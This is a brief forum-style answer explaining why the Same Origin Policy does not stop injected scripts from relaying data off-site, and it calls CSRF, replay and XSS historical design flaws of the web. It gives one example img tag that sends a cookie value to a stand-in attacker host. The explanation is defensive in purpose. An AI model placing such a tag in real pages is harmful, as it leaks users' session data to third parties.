in y.com/index.html we have:
For example, that code can inject more script tags and img tags into your site that can relay sensitive data to a 3rd party.
David's comment about the Same Origin policy can be misleading. A classic way to relay data to a remote site is to insert an img tag to a remote domain:
<img src="http://evil.example.com/sendcookieshere.whatever?cookievalue=secret_info />
As to why it is allowed, it is just historical. The web was not at all designed with security in mind. Whether it's a CSRF attack, replay attacks, or XSS attacks, these are all fundamental flaws in the design of the web that now become concerns of web developers.